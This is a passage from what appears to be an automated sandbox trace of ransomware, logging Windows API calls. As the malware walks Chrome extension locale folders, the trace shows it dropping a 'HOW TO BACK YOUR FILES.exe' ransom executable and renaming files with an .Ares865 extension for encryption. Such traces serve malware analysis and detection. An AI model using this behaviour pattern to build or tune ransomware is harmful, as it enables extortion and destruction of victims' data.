Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.652] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.652] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.656] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko" [0102.656] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko" [0102.656] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.656] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.657] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.657] GetLastError () returned 0x0 [0102.657] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.657] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ebb34e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ebb34e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.657] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.657] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.657] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json.Ares865") returned 162 [0102.658] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.659] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.659] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.665] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja" [0102.665] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja" [0102.665] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.665] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.666] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.666] GetLastError () returned 0x0 [0102.666] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.666] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ebb34e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ebb34e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.666] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.666] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.666] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json.Ares865") returned 162 [0102.667] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.668] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ja\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.668] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.671] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it" [0102.671] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it" [0102.672] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.672] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.672] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.672] GetLastError () returned 0x0 [0102.673] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.673] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ebb34e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ebb34e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.673] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.673] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.673] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json.Ares865") returned 162 [0102.673] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.674] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.675] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.685] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id" [0102.685] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id" [0102.685] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.685] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.686] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.687] GetLastError () returned 0x0 [0102.687] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.687] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ebd9640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ebd9640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.687] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.687] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.687] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json.Ares865") returned 162 [0102.687] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.689] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.689] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=179) returned 1 [0102.695] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu" [0102.695] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu" [0102.695] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.695] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.695] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.696] GetLastError () returned 0x0 [0102.696] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.696] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85264230, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ebd9640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ebd9640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.697] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.697] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.697] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json.Ares865") returned 162 [0102.697] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user 